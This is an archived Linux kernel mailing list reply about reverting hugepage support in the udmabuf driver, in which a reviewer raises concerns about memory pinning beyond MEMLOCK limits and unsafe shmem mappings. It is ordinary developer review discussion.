[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <281caf4f-25da-3a73-554b-4fb252963035@redhat.com>
Date: Mon, 12 Jun 2023 09:46:22 +0200
From: David Hildenbrand <david@...hat.com>
To: "Kasireddy, Vivek" <vivek.kasireddy@...el.com>,
Mike Kravetz <mike.kravetz@...cle.com>,
"linux-kernel@...r.kernel.org" <linux-kernel@...r.kernel.org>,
"linux-mm@...ck.org" <linux-mm@...ck.org>,
"dri-devel@...ts.freedesktop.org" <dri-devel@...ts.freedesktop.org>,
"qemu-devel@...gnu.org" <qemu-devel@...gnu.org>,
Hugh Dickins <hughd@...gle.com>
Cc: Gerd Hoffmann <kraxel@...hat.com>,
"Kim, Dongwon" <dongwon.kim@...el.com>,
"Chang, Junxiao" <junxiao.chang@...el.com>,
"kirill.shutemov@...ux.intel.com" <kirill.shutemov@...ux.intel.com>,
"Hocko, Michal" <mhocko@...e.com>,
"jmarchan@...hat.com" <jmarchan@...hat.com>,
"muchun.song@...ux.dev" <muchun.song@...ux.dev>,
James Houghton <jthoughton@...gle.com>,
Greg Kroah-Hartman <gregkh@...uxfoundation.org>,
Andrew Morton <akpm@...ux-foundation.org>,
"stable@...r.kernel.org" <stable@...r.kernel.org>
Subject: Re: [PATCH] udmabuf: revert 'Add support for mapping hugepages (v4)'
On 12.06.23 09:10, Kasireddy, Vivek wrote:
> Hi Mike,
Hi Vivek,
>
> Sorry for the late reply; I just got back from vacation.
> If it is unsafe to directly use the subpages of a hugetlb page, then reverting
> this patch seems like the only option for addressing this issue immediately.
> So, this patch is
> Acked-by: Vivek Kasireddy <vivek.kasireddy@...el.com>
>
> As far as the use-case is concerned, there are two main users of the udmabuf
> driver: Qemu and CrosVM VMMs. However, it appears Qemu is the only one
> that uses hugetlb pages (when hugetlb=on is set) as the backing store for
> Guest (Linux, Android and Windows) system memory. The main goal is to
> share the pages associated with the Guest allocated framebuffer (FB) with
> the Host GPU driver and other components in a zero-copy way. To that end,
> the guest GPU driver (virtio-gpu) allocates 4k size pages (associated with
> the FB) and pins them before sharing the (guest) physical (or dma) addresses
> (and lengths) with Qemu. Qemu then translates the addresses into file
> offsets and shares these offsets with udmabuf.
Is my understanding correct, that we can effectively long-term pin
(worse than mlock) 64 MiB per UDMABUF_CREATE, allowing eventually !root
users
ll /dev/udmabuf
crw-rw---- 1 root kvm 10, 125 12. Jun 08:12 /dev/udmabuf
to bypass there effective MEMLOCK limit, fragmenting physical memory and
breaking swap?
Regarding the udmabuf_vm_fault(), I assume we're mapping pages we
obtained from the memfd ourselves into a special VMA (mmap() of the
udmabuf). I'm not sure how well shmem pages are prepared for getting
mapped by someone else into an arbitrary VMA (page->index?).
... also, just imagine someone doing FALLOC_FL_PUNCH_HOLE / ftruncate()
on the memfd. What's mapped into the memfd no longer corresponds to
what's pinned / mapped into the VMA.
Was linux-mm (and especially shmem maintainers, ccing Hugh) involved in
the upstreaming of udmabuf?
--
Cheers,
David / dhildenb
Powered by blists - more mailing lists